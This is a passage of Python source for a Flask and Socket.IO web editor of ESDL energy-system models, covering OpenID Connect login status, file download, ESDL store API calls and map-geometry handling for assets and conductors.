# - comment the @oidc.require_login above this method
# - comment the line above: return render_template('index.html')
# - uncomment the following line:
# return render_template('editor.html', async_mode=socketio.async_mode, role=role)
"""
Checks the OpenID connect session status
And refreshes if necessary?
"""
@app.route('/auth_status')
#@oidc.require_login
def auth_status():
from flask import g
#logger.debug("Global token: {}".format(g.oidc_id_token))
status: Response = oidc.authenticate_or_redirect()
if status is None:
if oidc.user_loggedin:
curr_token = get_session('jwt-token')
if oidc.get_access_token() is not None:
if curr_token is not None and curr_token == oidc.get_access_token():
return {'valid': True, 'reason': "Unchanged"}
else:
logger.info("Refreshed access token for {}".format(oidc.user_getfield('email')))
set_session('jwt-token', oidc.get_access_token())
return {'valid': True, 'reason': "Refreshed"}
else:
# this is the case when we restarted the app, but the browser still has a valid cookie and
# seems still authorized, while the token has not been refreshed or is accessible via oidc.
#if g.oidc_id_token is not None:
# update oidc with session info
#oidc.credentials_store[g.oidc_id_token['sub']] = g.oidc_id_token
#logger.debug("Setting cookie access token ", oidc.get_access_token())
#set_session('jwt-token', oidc.get_access_token())
#return {'valid': True, 'reason': "Updated token"}
g.oidc_id_token = None
oidc.logout()
status: Response = oidc.redirect_to_auth_server('/editor')
uri = status.headers["Location"]
return {'valid': False, 'reason': "Token expired or not available", 'redirect_uri': uri}
else:
oidc.logout()
return {'valid': False, 'reason': "Not logged in"}
else:
status: Response = oidc.redirect_to_auth_server('/editor') # get redirect for /editor, not /auth_status
uri = status.headers["Location"]
return {'valid': False, 'reason': "Authentication required", 'redirect_uri': uri}
# return status # returns a redirect, but that is consumed by the browser because of a 302 status
@app.route('/logout')
def logout():
user_email = get_session('user-email')
user_actions_logging.store_logging(user_email, "logout", "", "", "", {})
"""Performs local logout by removing the session cookie. and does a logout at the IDM"""
oidc.logout()
#This should be done automatically! see issue https://github.com/puiterwijk/flask-oidc/issues/88
return redirect(oidc.client_secrets.get('issuer') + '/protocol/openid-connect/logout?redirect_uri=' + request.host_url)
# Cant find out why send_file does not work in uWSGI with threading.
# Now we send manually the ESDL as string, which is (probably) not efficient.
# This still works with a 1.6 MB file... Not sure if this scales any further...
@app.route('/esdl')
def download_esdl():
"""Sends the current ESDL file to the browser as an attachment"""
esh = get_handler()
active_es_id = get_session('active_es_id')
try:
#stream = esh.to_bytesio()
my_es = esh.get_energy_system(es_id=active_es_id)
esh.update_version(es_id=active_es_id)
if my_es.esdlVersion is None or my_es.esdlVersion == '':
my_es.esdlVersion = esdl_doc.get_esdl_version()
try:
name = my_es.name
except:
name = my_es.id
if name is None or name == '':
name = "UntitledEnergySystem"
name = '{}.esdl'.format(name)
logger.info('Sending file %s' % name)
user_email = get_session('user-email')
user_actions_logging.store_logging(user_email, "download esdl", name, "", "", {})
content = esh.to_string(es_id=active_es_id)
#wrapped_io = FileWrapper(stream)
#logger.debug(content)
headers = dict()
#headers['Content-Type'] = 'application/esdl+xml'
headers['Content-Disposition'] = 'attachment; filename="{}"'.format(name)
headers['Content-Length'] = len(content)
return Response(content, mimetype='application/esdl+xml', direct_passthrough=True, headers=headers)
#return send_file(stream, as_attachment=True, mimetype='application/esdl+xml', attachment_filename=name)
except Exception as e:
import traceback
traceback.print_exc()
return "Error sending ESDL file, due to {}".format(e)
@app.route('/<path:path>')
def serve_static(path):
# logger.debug('in serve_static(): '+ path)
return send_from_directory('static', path)
# @app.route('/edr_assets')
# def get_edr_assets():
# edr_url = settings.edr_config['EDR_host']+'/store/tagged?tag=asset'
# # logger.debug('accessing URL: '+edr_url)
#
# try:
# r = requests.get(edr_url)
# if r.status_code == 200:
# result = json.loads(r.text)
# asset_list = []
# for a in result:
# asset = {'id': a["id"], 'title': a["title"], 'description': a["description"]}
# asset_list.append(asset)
#
# return (jsonify({'asset_list': asset_list})), 200
# else:
# logger.error('code: ', r.status_code)
# send_alert('Error in getting the EDR assets')
# abort(500, 'Error in getting the EDR assets')
# except Exception as e:
# logger.error('Exception: ')
# logger.error(e)
# send_alert('Error accessing EDR API')
# abort(500, 'Error accessing EDR API')
# ---------------------------------------------------------------------------------------------------------------------
# File I/O and ESDL Store API calls
# ---------------------------------------------------------------------------------------------------------------------
if settings.esdl_store_config is not None and settings.esdl_store_config != "":
default_store_url = settings.esdl_store_config['hostname'] + '/store/'
else:
default_store_url = None
if settings.mondaine_hub_config is not None and settings.mondaine_hub_config != "":
mondaine_hub_url = settings.mondaine_hub_config['hostname'] + '/store/'
else:
mondaine_hub_url = None
def create_ESDL_store_item(id, esh, title, description, email):
role = get_session('user-role')
if 'mondaine' in role:
store_url = mondaine_hub_url
else:
store_url = default_store_url
if store_url:
esdlstr = esh.to_string()
try:
payload = {'id': id, 'title': title, 'description': description, 'email':email, 'esdl': esdlstr}
requests.post(store_url, data=payload)
except Exception as e:
send_alert('Error accessing ESDL store:' + str(e))
def load_ESDL_EnergySystem(store_id):
store_item = load_store_item(store_id)
if store_item:
esdlstr = store_item['esdl']
del store_item['esdl']
set_session('store_item_metadata', store_item)
emit('store_item_metadata', store_item)
try:
esh = get_handler()
es, parse_info = esh.load_from_string(esdl_string=esdlstr, name=store_item['title'])
if len(parse_info) > 0:
info = ''
for line in parse_info:
info += line + "\n"
send_alert("Warnings while opening {}:\n\n{}".format(store_item['title'], info))
return esh
except Exception as e:
send_alert('Error interpreting ESDL file from store: ' + str(e))
return None
else:
return None
def import_ESDL_EnergySystem(store_id):
store_item = load_store_item(store_id)
if store_item:
esdlstr = store_item['esdl']
del store_item['esdl']
set_session('store_item_metadata', store_item)
emit('store_item_metadata', store_item)
try:
esh = get_handler()
imported_es, parse_info = esh.add_from_string(esdl_string=esdlstr, name=store_item['title'])
if len(parse_info) > 0:
info = ''
for line in parse_info:
info += line + "\n"
send_alert("Warnings while opening {}:\n\n{}".format(store_item['title'], info))
return imported_es
except Exception as e:
send_alert('Error interpreting ESDL file from store: ' + str(e))
return None
else:
return None
def load_store_item(store_id):
role = get_session('user-role')
if 'mondaine' in role:
store_url = mondaine_hub_url
else:
store_url = default_store_url
if store_url:
url = store_url + store_id + '?format=xml'
try:
r = requests.get(url)
except Exception as e:
send_alert('Error accessing ESDL store:' + str(e))
return None
if r.status_code == 200:
result = json.loads(r.text)
if len(result) > 0:
return result
else:
return None
else:
logger.error('Accessing store return status: '+str(r.status_code))
send_alert('Error accessing ESDL store:' + str(r))
return None
else:
return None
def update_store_item(store_id, title, descr, email, tags, esh):
role = get_session('user-role')
if 'mondaine' in role:
store_url = mondaine_hub_url
else:
store_url = default_store_url
if store_url:
esdlstr = esh.to_string()
payload = {'id': store_id, 'title': title, 'description': descr, 'email': email, 'tags': tags, 'esdl': esdlstr}
try:
requests.put(store_url + store_id, data=payload)
except Exception as e:
send_alert('Error saving ESDL file to store: ' + str(e))
def create_new_store_item(store_id, title, descr, email, tags, esh):
role = get_session('user-role')
if 'mondaine' in role:
store_url = mondaine_hub_url
else:
store_url = default_store_url
if store_url:
esdlstr = esh.to_string()
payload = {'id': store_id, 'title': title, 'description': descr, 'email': email, 'tags': tags, 'esdl': esdlstr}
try:
r = requests.post(store_url, data=payload)
except Exception as e:
send_alert('Error saving ESDL file to store: ' + str(e))
if r.status_code != 201:
send_alert('Error saving ESDL file to store. Error code: ' + str(r.status_code))
# ---------------------------------------------------------------------------------------------------------------------
# parse the ESDL config file
# ---------------------------------------------------------------------------------------------------------------------
def parse_esdl_config():
esdlc = esdl_config.esdl_config
logger.info('Configuration found: {}'.format(esdlc))
# ---------------------------------------------------------------------------------------------------------------------
# Send alert to client UI
# ---------------------------------------------------------------------------------------------------------------------
def send_alert(message):
logger.warning(message)
emit('alert', message, namespace='/esdl')
# FIXME: pyecore
def _set_carrier_for_connected_transport_assets(asset_id, carrier_id, processed_assets):
active_es_id = get_session('active_es_id')
esh = get_handler()
asset = esh.get_by_id(active_es_id, asset_id)
processed_assets.append(asset_id)
port_list = []
for p in asset.port:
p.carrier = esh.get_by_id(active_es_id, carrier_id) #FIXME pyecore
conn_to = p.connectedTo
if conn_to:
for conn_port in conn_to:
conn_asset = get_asset_from_port_id(esh, active_es_id, conn_port.id)
if isinstance(conn_asset, esdl.Transport) and not isinstance(conn_asset, esdl.HeatExchange) \
and not isinstance(conn_asset, esdl.Transformer):
if conn_asset.id not in processed_assets:
_set_carrier_for_connected_transport_assets(conn_asset.id, carrier_id, processed_assets)
else:
conn_asset_port_list = []
for conn_asset_port in conn_asset.port:
if conn_asset_port.id == conn_port.id:
conn_asset_port.carrier = p.carrier
for conn_to_same_port in conn_asset_port.connectedTo:
if conn_to_same_port.id is not p.id: # don't traverse back to the original port
conn_to_same_port_asset = get_asset_from_port_id(esh, active_es_id, conn_to_same_port.id)
if not conn_to_same_port_asset.id in processed_assets:
_set_carrier_for_connected_transport_assets(conn_to_same_port_asset.id, carrier_id, processed_assets)
conn_asset_port_list.append({'name': conn_asset_port.name, 'id': conn_asset_port.id,
'type': type(conn_asset_port).__name__, 'conn_to': [pt.id for pt in conn_asset_port.connectedTo],
'carrier': conn_asset_port.carrier.id if conn_asset_port.carrier else None})
# also update the ports of the 'leaf' asset (recursion stops here)
emit('update_asset', {'asset_id': conn_asset.id, 'ports': conn_asset_port_list})
port_list.append({'name': p.name, 'id': p.id, 'type': type(p).__name__,
'conn_to': [pt.id for pt in p.connectedTo], 'carrier': p.carrier.id if p.carrier else None})
# update the asset ports in the gui, if the carrier has changed.
emit('update_asset', {'asset_id': asset.id, 'ports': port_list})
def set_carrier_for_connected_transport_assets(asset_id, carrier_id):
processed_assets = [] # List of asset_id's that are processed
_set_carrier_for_connected_transport_assets(asset_id, carrier_id, processed_assets)
# logger.debug(processed_assets)
# ---------------------------------------------------------------------------------------------------------------------
# Build up initial information about energysystem to send to browser
# ---------------------------------------------------------------------------------------------------------------------
def generate_point_in_area(boundary):
return
def update_building_asset_geometries(building, avail_locations):
for basset in building.asset:
if isinstance(basset, esdl.EnergyAsset):
geom = basset.geometry
if not geom:
location = avail_locations.pop(0)
geom = esdl.Point(lon=location[1], lat=location[0])
basset.geometry = geom
def update_area_asset_geometries(area, avail_locations):
# process subareas
for ar in area.area:
update_area_asset_geometries(ar, avail_locations)
# process assets in area
for asset in area.asset:
if isinstance(asset, esdl.AbstractBuilding):
update_building_asset_geometries(asset, avail_locations)
if isinstance(asset, esdl.EnergyAsset):
geom = asset.geometry
if not geom:
location = avail_locations.pop(0)
geom = esdl.Point()
geom = esdl.Point(lon=location[1], lat=location[0])
asset.geometry = geom
def count_building_assets_and_potentials(building):
# TODO: Error: BuildingUnits are taken into account
# TODO: add potentials
num = len(building.asset)
for basset in building.asset:
if isinstance(basset, esdl.AbstractBuilding):
num += count_building_assets_and_potentials(basset)
return num
def count_assets_and_potentials(area):
num = len(area.asset)
num += len(area.potential)
for ar_asset in area.asset:
if isinstance(ar_asset, esdl.AbstractBuilding):
num += count_building_assets_and_potentials(ar_asset)
for ar in area.area:
num += count_assets_and_potentials(ar)
return num
def calculate_triangle_center(triangle):
sumx = triangle[0][0] + triangle[1][0] + triangle[2][0]
sumy = triangle[0][1] + triangle[1][1] + triangle[2][1]
center_coord = [sumx / 3, sumy / 3]
return center_coord
def get_control_strategy_info(asset):
control_strategy = asset.controlStrategy
if control_strategy:
cs_info = {
'id': control_strategy.id,
'name': control_strategy.name,
'type': type(control_strategy).__name__
}
if isinstance(control_strategy, esdl.DrivenByDemand):
if control_strategy.outPort:
cs_info['out_port_id'] = control_strategy.outPort.id
if isinstance(control_strategy, esdl.DrivenBySupply):
if control_strategy.inPort:
cs_info['in_port_id'] = control_strategy.inPort.id
if isinstance(control_strategy, esdl.DrivenByProfile):
if control_strategy.port:
cs_info['port_id'] = control_strategy.port.id
if control_strategy.profile:
cs_info['profile_id'] = control_strategy.profile.id
if isinstance(control_strategy, esdl.StorageStrategy):
mcc, mdc = get_storage_marginal_costs(asset.id)
cs_info['marginal_charge_costs'] = mcc
cs_info['marginal_discharge_costs'] = mdc
if isinstance(control_strategy, esdl.CurtailmentStrategy):
cs_info['max_power'] = control_strategy.maxPower
if isinstance(control_strategy, esdl.PIDController):
cs_info['kp'] = control_strategy.Kp
cs_info['ki'] = control_strategy.Ki
cs_info['kd'] = control_strategy.Kd
return cs_info
else:
return {}
def add_bld_to_area_bld_list(bld_to_add, to_area_or_bld_id, ab_list):
# area_bld_list.append(['Building', building.id, building.name, level])
for idx, rcv_ab in enumerate(ab_list):
if rcv_ab[1] == to_area_or_bld_id:
ab_list.insert(idx+1, ['Building', bld_to_add.id, bld_to_add.name, rcv_ab[3] + 1])
def add_area_to_area_bld_list(area_to_add, to_area_id, ab_list):
# area_bld_list.append(['Area', area.id, area.name, level])
for idx, rcv_ab in enumerate(ab_list):
if rcv_ab[1] == to_area_id:
ab_list.insert(idx+1, ['Area', area_to_add.id, area_to_add.name, rcv_ab[3] + 1])
def remove_ab_from_area_bld_list(ab_id, ab_list):
for idx, ab in enumerate(ab_list):
if ab[1] == ab_id:
ab_list.pop(idx)
return
# TODO: Not used now, should we keep the conn_list updated? --> Yes, now we do! For redrawing when selecting carriers
# 13-1-2020: Commented out: energycarrier info for port not added yet because function is not used at the moment.
#def add_connection_to_list(conn_list, from_port_id, from_asset_id, from_asset_coord, to_port_id, to_asset_id, to_asset_coord):
# conn_list.append(
# {'from-port-id': from_port_id, 'from-asset-id': from_asset_id, 'from-asset-coord': from_asset_coord,
# 'to-port-id': to_port_id, 'to-asset-id': to_asset_id, 'to-asset-coord': to_asset_coord})
def update_asset_connection_locations(ass_id, lat, lon):
active_es_id = get_session('active_es_id')
conn_list = get_session_for_esid(active_es_id, 'conn_list')
for c in conn_list:
if c['from-asset-id'] == ass_id:
c['from-asset-coord'] = (lat, lon)
if c['to-asset-id'] == ass_id:
c['to-asset-coord'] = (lat, lon)
emit('clear_connections') # clear current active layer connections
emit('add_connections', {'es_id': active_es_id, 'conn_list': conn_list})
def update_transport_connection_locations(ass_id, asset, coords):
active_es_id = get_session('active_es_id')
esh = get_handler()
conn_list = get_session_for_esid(active_es_id, 'conn_list')
# logger.debug('Updating locations')
for c in conn_list:
if c['from-asset-id'] == ass_id:
port_id = c['from-port-id']
port_ass_map = get_asset_and_coord_from_port_id(esh, active_es_id, port_id)
c['from-asset-coord'] = port_ass_map['coord']
if c['to-asset-id'] == ass_id:
port_id = c['to-port-id']
port_ass_map = get_asset_and_coord_from_port_id(esh, active_es_id, port_id)
c['to-asset-coord'] = port_ass_map['coord']
emit('clear_connections') # clear current active layer connections
emit('add_connections', {'es_id': active_es_id, 'conn_list': conn_list})
def update_polygon_asset_connection_locations(ass_id, coords):
active_es_id = get_session('active_es_id')
conn_list = get_session_for_esid(active_es_id, 'conn_list')
for c in conn_list:
if c['from-asset-id'] == ass_id:
c['from-asset-coord'] = coords
if c['to-asset-id'] == ass_id:
c['to-asset-coord'] = coords
emit('clear_connections') # clear current active layer connections
emit('add_connections', {'es_id': active_es_id, 'conn_list': conn_list})
set_session_for_esid(active_es_id, 'conn_list', conn_list)
# ---------------------------------------------------------------------------------------------------------------------
# Create connections between assets
# ---------------------------------------------------------------------------------------------------------------------
def connect_ports(port1, port2):
port1.connectedTo.append(port2)
def split_conductor(conductor, location, mode, conductor_container):
active_es_id = get_session('active_es_id')
conn_list = get_session_for_esid(active_es_id, 'conn_list')
esh = get_handler()
geometry = conductor.geometry
conductor_type = type(conductor).__name__
conductor_id = conductor.id
middle_point = esdl.Point(lat=location['lat'], lon=location['lng']) #no elevation?
if isinstance(geometry, esdl.Line):
#create two seperate line segments
line1 = esdl.Line()
line2 = esdl.Line()
#find piece of line where user clicked
points = geometry.point
begin_point = points[0]
first_point = points[0] # make an additional copy
# Ewoud: this code is not so nice since it manipulates the original geometry.point with points.pop(0) later on
# this should be fixed, but not now (not time)
# pyEcore: somehow using points[0] does something strange in the serialization to XML
# instead of <point xsi:type="esdl:Point"> you get <esdl:Point lat=...> which is wrong
# duplicating this point manually fixes this, probably because there is a reference to this point
# elsewhere which gets serialized as an <esdl:Point>
# officially we should duplicate all Point in this code
line1.point.append(esdl.Point(lat=begin_point.lat, lon=begin_point.lon, elevation=begin_point.elevation))
points.pop(0)
min_dist = 1e99
segm_ctr = 0
min_dist_segm = 0
for point in points:
p1 = {'x': begin_point.lat, 'y': begin_point.lon}
p2 = {'x': point.lat, 'y': point.lon}
p = {'x': location['lat'], 'y': location['lng']}
dist = ESDLGeometry.distance_point_to_line(p, p1, p2)
if dist < min_dist:
min_dist = dist
min_dist_segm = segm_ctr
begin_point = point
segm_ctr += 1
# copy appropriate points in original conductor to either line1 or line2
points = geometry.point
segm_ctr = 0
logger.debug('segment min = {}'.format(min_dist_segm))
for point in list(points):
if segm_ctr == min_dist_segm:
new_point = esdl.Point(lon=middle_point.lon, lat=middle_point.lat, elevation=middle_point.elevation)
line1.point.append(new_point)
line2.point.append(new_point.clone())
if segm_ctr < min_dist_segm:
line1.point.append(point)
else:
line2.point.append(point)
segm_ctr += 1
# find old ports and connections
ports = conductor.port
if len(ports) != 2:
send_alert('UNSUPPORTED: Conductor doesn\'t have two ports!')
return
port1 = ports[0] # reuse old conductor's ports; TODO: check what happens after deleting conductor
port2 = ports[1]
new_cond1_id = str(uuid.uuid4())
new_cond2_id = str(uuid.uuid4())
new_port1_id = str(uuid.uuid4())
new_port2_id = str(uuid.uuid4())
# create two conductors of same type as conductor that is splitted by duplicating the original
# e.g. also copy over the pipe material
new_cond1 = conductor.deepcopy()
new_cond2 = conductor.deepcopy()
if new_cond1.name == new_cond1.eClass.name + '_' + new_cond1.id[:4]:
new_cond1.name = new_cond1.eClass.name + '_' + new_cond1_id[:4]
new_cond2.name = new_cond2.eClass.name + '_' + new_cond2_id[:4]
else:
new_cond2.name = new_cond1.name + '_b'
new_cond1.name = new_cond1.name + '_a'
new_cond1.id = new_cond1_id
new_cond1.port.clear() # remove existing port, as we add previous used ports later
new_cond2.id = new_cond2_id
new_cond2.port.clear()
esh.add_object_to_dict(active_es_id, new_cond1)
esh.add_object_to_dict(active_es_id, new_cond2)
if type(port1).__name__ == "InPort":
new_port2 = esdl.OutPort(id=new_port2_id, name='Out')
else:
new_port2 = esdl.InPort(id=new_port2_id, name='In')
new_cond1.port.append(port1)
new_cond1.port.append(new_port2)
if type(port2).__name__ == "InPort":
new_port1 = esdl.OutPort(id=new_port1_id, name='Out')
else:
new_port1 = esdl.InPort(id=new_port1_id, name='In')
if mode == 'connect':
new_port1.connectedTo.append(new_port2)
new_port2.connectedTo.append(new_port1)
new_cond2.port.append(new_port1)
new_cond2.port.append(port2)
esh.add_object_to_dict(active_es_id, new_port1)
esh.add_object_to_dict(active_es_id, new_port2)
# calculate line lengths
start = line1.point[0]
length = 0
for i in range(1, len(line1.point)):
length += ESDLGeometry.distance((start.lat, start.lon), (line1.point[i].lat, line1.point[i].lon)) * 1000
start = line1.point[i]
new_cond1.length = round(length, 2)
start = line2.point[0]
length = 0
for i in range(1, len(line2.point)):
length += ESDLGeometry.distance((start.lat, start.lon), (line2.point[i].lat, line2.point[i].lon)) * 1000
start = line2.point[i]
new_cond2.length = round(length, 2)
logger.debug('split-conductor: line1 length={}, line2 length={}'.format(new_cond1.length, new_cond2.length))
# assign line geometry to the correct conductor
new_cond1.geometry = line1
new_cond2.geometry = line2
# remove conductor from container (area or building) and add new two conductors
assets = conductor_container.asset
assets.remove(conductor)
esh.remove_object_from_dict(active_es_id, conductor)
conductor_container.asset.append(new_cond1)
conductor_container.asset.append(new_cond2)
# create list of ESDL assets to be added to UI
esdl_assets_to_be_added = []
coords1 = []
for point in line1.point:
coords1.append([point.lat, point.lon])
port_list = []
carrier = None
if port1.carrier: carrier = port1.carrier
if port2.carrier: carrier = port2.carrier
carrier_id = carrier.id if carrier is not None else None
for p in new_cond1.port:
p.carrier = carrier
port_list.append({'name': p.name, 'id': p.id, 'type': type(p).__name__,
'conn_to': [p.id for p in p.connectedTo], 'carrier': carrier_id})
state = asset_state_to_ui(new_cond1)
tooltip_asset_attrs = get_tooltip_asset_attrs(new_cond1, 'line')
add_spatial_attributes(new_cond1, tooltip_asset_attrs)
esdl_assets_to_be_added.append(['line', 'asset', new_cond1.name, new_cond1.id, type(new_cond1).__name__,
coords1, tooltip_asset_attrs, state, port_list])
coords2 = []
for point in line2.point:
coords2.append([point.lat, point.lon])
port_list = []
for p in new_cond2.port:
p.carrier = carrier
port_list.append({'name': p.name, 'id': p.id, 'type': type(p).__name__,
'conn_to': [p.id for p in p.connectedTo], 'carrier': carrier_id})
state = asset_state_to_ui(new_cond2)
tooltip_asset_attrs = get_tooltip_asset_attrs(new_cond2, 'line')
add_spatial_attributes(new_cond2, tooltip_asset_attrs)
esdl_assets_to_be_added.append(['line', 'asset', new_cond2.name, new_cond2.id, type(new_cond2).__name__,
coords2, tooltip_asset_attrs, state, port_list])
# update asset id's of conductor with new_cond1 and new_cond2 in conn_list
for c in conn_list:
if c['from-asset-id'] == conductor_id and c['from-port-id'] == port1.id:
c['from-asset-id'] = new_cond1_id
if c['from-asset-id'] == conductor_id and c['from-port-id'] == port2.id:
c['from-asset-id'] = new_cond2_id
if c['to-asset-id'] == conductor_id and c['to-port-id'] == port1.id:
c['to-asset-id'] = new_cond1_id
if c['to-asset-id'] == conductor_id and c['to-port-id'] == port2.id:
c['to-asset-id'] = new_cond2_id
# create list of connections to be added to UI
if mode == 'connect':
conn_list.append({'from-port-id': new_port2_id, 'from-port-carrier': carrier_id,
'from-asset-id': new_cond1_id, 'from-asset-coord': (middle_point.lat, middle_point.lon),
'to-port-id': new_port1_id, 'to-port-carrier': carrier_id, 'to-asset-id': new_cond2_id,
'to-asset-coord': (middle_point.lat, middle_point.lon)})
if mode == 'add_joint':
joint_id = str(uuid.uuid4())
joint = esdl.Joint(id=joint_id, name='Joint_'+joint_id[:4])
inp = esdl.InPort(id=str(uuid.uuid4()), name='In')
outp = esdl.OutPort(id=str(uuid.uuid4()), name='Out')
if carrier:
inp.carrier = carrier
outp.carrier = carrier
if type(new_port2).__name__ == "OutPort":
inp.connectedTo.append(new_port2)
new_port2_conn_to_id = inp.id
else:
outp.connectedTo.append(new_port2)
new_port2_conn_to_id = outp.id
if type(new_port1).__name__ == "InPort":
outp.connectedTo.append(new_port1)
new_port1_conn_to_id = outp.id
else:
inp.connectedTo.append(new_port1)
new_port1_conn_to_id = inp.id
joint.port.append(inp)
joint.port.append(outp)
joint.geometry = middle_point
conductor_container.asset.append(joint)
esh.add_object_to_dict(active_es_id, joint)
esh.add_object_to_dict(active_es_id, inp)
esh.add_object_to_dict(active_es_id, outp)
port_list = []
for p in joint.port:
p.carrier = carrier
port_list.append({'name': p.name, 'id': p.id, 'type': type(p).__name__,
'conn_to': [p.id for p in p.connectedTo], 'carrier': carrier_id})
capability_type = ESDLAsset.get_asset_capability_type(joint)
state = asset_state_to_ui(joint)
tooltip_asset_attrs = get_tooltip_asset_attrs(joint, 'marker')
esdl_assets_to_be_added.append(['point', 'asset', joint.name, joint.id, type(joint).__name__,
[middle_point.lat, middle_point.lon], tooltip_asset_attrs, state, port_list,
capability_type])
conn_list.append({'from-port-id': new_port2_id, 'from-port-carrier': carrier_id,
'from-asset-id': new_cond1_id, 'from-asset-coord': (middle_point.lat, middle_point.lon),
'to-port-id': new_port2_conn_to_id, 'to-port-carrier': carrier_id,
'to-asset-id': joint.id, 'to-asset-coord': (middle_point.lat, middle_point.lon)})
conn_list.append({'from-port-id': new_port1_conn_to_id, 'from-port-carrier': carrier_id,
'from-asset-id': joint.id, 'from-asset-coord': (middle_point.lat, middle_point.lon),
'to-port-id': new_port1_id, 'to-port-carrier': carrier_id,
'to-asset-id': new_cond2_id, 'to-asset-coord': (middle_point.lat, middle_point.lon)})
# now send new objects to UI
emit('add_esdl_objects', {'es_id': active_es_id, 'asset_pot_list': esdl_assets_to_be_added, 'zoom': False})
emit('clear_connections') # clear current active layer connections
emit('delete_esdl_object', {'asset_id': conductor.id}) # remove original condutor from map
emit('add_connections', {'es_id': active_es_id, 'conn_list': conn_list})
else:
send_alert('UNSUPPORTED: Conductor is not of type esdl.Line!')
# ---------------------------------------------------------------------------------------------------------------------
# Update ESDL coordinates on movement of assets in browser
# ---------------------------------------------------------------------------------------------------------------------
@socketio.on('update-coord', namespace='/esdl')
def update_coordinates(message):
# This function can also be called when the geometry of an asset is of type esdl.Polygon, because
# the asset on the leaflet map is both represented as a Polygon and a Point (to connect, to attach menus)
active_es_id = get_session('active_es_id')
esh = get_handler()
obj_id = message['id']
coords = message['coordinates']
object = esh.get_by_id(active_es_id, obj_id)
# object can be an EnergyAsset, Building, Potential or Note
if object:
if isinstance(object, esdl.Note):
geom = object.mapLocation
else:
geom = object.geometry
if isinstance(geom, esdl.Point):
point = esdl.Point(lon=float(coords['lng']), lat=float(coords['lat']))
if isinstance(object, esdl.Note):
object.mapLocation = point
else:
object.geometry = point
# elif isinstance(geom, esdl.Polygon):
# Do nothing in case of a polygon
# only update the connection locations and mappings based on the center of the polygon
# that is given as a parameter.
# update coordinates in asset_list
asset_list = get_session_for_esid(active_es_id, 'asset_list')
for a in asset_list:
if a[3] == obj_id:
a[5] = [coords['lat'], coords['lng']]
break # ready searching
if isinstance(object, (esdl.EnergyAsset, esdl.AbstractBuilding)):
# Update locations of connections on moving assets
update_asset_connection_locations(obj_id, coords['lat'], coords['lng'])
# TODO: Check if this is still required
if message['asspot'] == 'building':
send_alert("Assets in building with locations are not updated yet")
@socketio.on('update-line-coord', namespace='/esdl')
def update_line_coordinates(message):
# logger.debug ('received polyline: ' + str(message['id']) + ':' + str(message['polyline']))
ass_id = message['id']
active_es_id = get_session('active_es_id')
esh = get_handler()
asset = esh.get_by_id(active_es_id, ass_id)
if asset:
ports = asset.port
polyline_data = message['polyline']
# logger.debug(polyline_data)
# logger.debug(type(polyline_data))
polyline_length = float(message['length'])
asset.length = polyline_length
line = esdl.Line()
for i in range(0, len(polyline_data)):
coord = polyline_data[i]
point = esdl.Point(lon=coord['lng'], lat=coord['lat'])
line.point.append(point)
asset.geometry = line
# update coordinates in asset_list
asset_list = get_session_for_esid(active_es_id, 'asset_list')
for a in asset_list:
if a[3] == ass_id:
a[5] = [(coord['lat'], coord['lng']) for coord in polyline_data]
break # ready searching
update_transport_connection_locations(ass_id, asset, polyline_data)
@socketio.on('update-polygon-coord', namespace='/esdl')
def update_polygon_coordinates(message):
# logger.debug ('received polygon: ' + str(message['id']) + ':' + str(message['polygon']))
ass_id = message['id']
active_es_id = get_session('active_es_id')
esh = get_handler()
asset = esh.get_by_id(active_es_id, ass_id)
if asset:
polygon_data = message['polygon']
# logger.debug(polygon_data)
# logger.debug(type(polygon_data))
polygon_area = int(message['polygon_area'])
asset.surfaceArea = polygon_area
polygon_data = ESDLGeometry.remove_duplicates_in_polygon(polygon_data)
polygon_data = ESDLGeometry.remove_latlng_annotation_in_array_of_arrays(polygon_data)
polygon_data = ESDLGeometry.exchange_polygon_coordinates(polygon_data) # --> [lon, lat]
polygon = ESDLGeometry.convert_pcoordinates_into_polygon(polygon_data) # expects [lon, lat]
asset.geometry = polygon
polygon_center = ESDLGeometry.calculate_polygon_center(polygon)
update_polygon_asset_connection_locations(ass_id, polygon_center)
# ---------------------------------------------------------------------------------------------------------------------
# Control Strategies
# ---------------------------------------------------------------------------------------------------------------------
def get_control_strategies(es):
strategies = []
services = es.services
if services:
services_list = services.service
for service in services_list:
if isinstance(service, esdl.ControlStrategy):
strategies.append(service)
return strategies
def get_control_strategy_for_asset(asset_id):
active_es_id = get_session('active_es_id')
esh = get_handler()
asset = esh.get_by_id(active_es_id, asset_id)
return asset.controlStrategy
# strategies = get_control_strategies(es)
# for strategy in strategies:
# cs_a = strategy.energyAsset
# if cs_a.id == asset_id:
# return strategy
# return None
def add_control_strategy_for_asset(asset_id, cs):
active_es_id = get_session('active_es_id')
esh = get_handler()
es = esh.get_energy_system(es_id=active_es_id)
services = es.services
if not services:
services = esdl.Services()
es.services = services
services_list = services.service
for service in set(services_list):
if isinstance(service, esdl.ControlStrategy):
if service.energyAsset.id == asset_id:
services_list.remove(service)
services.service.append(cs)
def add_drivenby_control_strategy_for_asset(asset_id, control_strategy, port_id):
active_es_id = get_session('active_es_id')
esh = get_handler()
module = importlib.import_module('esdl.esdl')
class_ = getattr(module, control_strategy)
cs = class_()
asset = esh.get_by_id(active_es_id, asset_id)
asset_name = asset.name
if not asset_name:
asset_name = 'unknown'
cs.id = str(uuid.uuid4())
cs.name = control_strategy + ' for ' + asset_name
cs.energyAsset = asset
if control_strategy == 'DrivenByDemand':
cs.outPort = next((p for p in esdl.Port.allInstances() if p.id == port_id), None)
if control_strategy == 'DrivenBySupply':
cs.inPort = next((p for p in esdl.Port.allInstances() if p.id == port_id), None)
add_control_strategy_for_asset(asset_id, cs)
def add_storage_control_strategy_for_asset(asset_id, mcc, mdc):
active_es_id = get_session('active_es_id')
esh = get_handler()
asset = esh.get_by_id(active_es_id, asset_id)
if not asset.name:
asset.name = 'Unknown Asset'
cs = esdl.StorageStrategy()
cs.id = str(uuid.uuid4())
cs.name = 'StorageStrategy for ' + asset.name
cs.energyAsset = asset
mcc_sv = esdl.SingleValue(id=str(uuid.uuid4()), name='marginalChargeCosts for ' + asset.name, value=str2float(mcc))
cs.marginalChargeCosts = mcc_sv
mdc_sv = esdl.SingleValue(id=str(uuid.uuid4()), name='marginalChargeCosts for ' + asset.name, value=str2float(mdc))
cs.marginalDischargeCosts = mdc_sv
add_control_strategy_for_asset(asset_id, cs)
def add_curtailment_control_strategy_for_asset(asset_id, max_power):
active_es_id = get_session('active_es_id')
esh = get_handler()
asset = esh.get_by_id(active_es_id, asset_id)
if not asset.name:
asset.name = 'Unknown Asset'
cs = esdl.CurtailmentStrategy()
cs.id = str(uuid.uuid4())
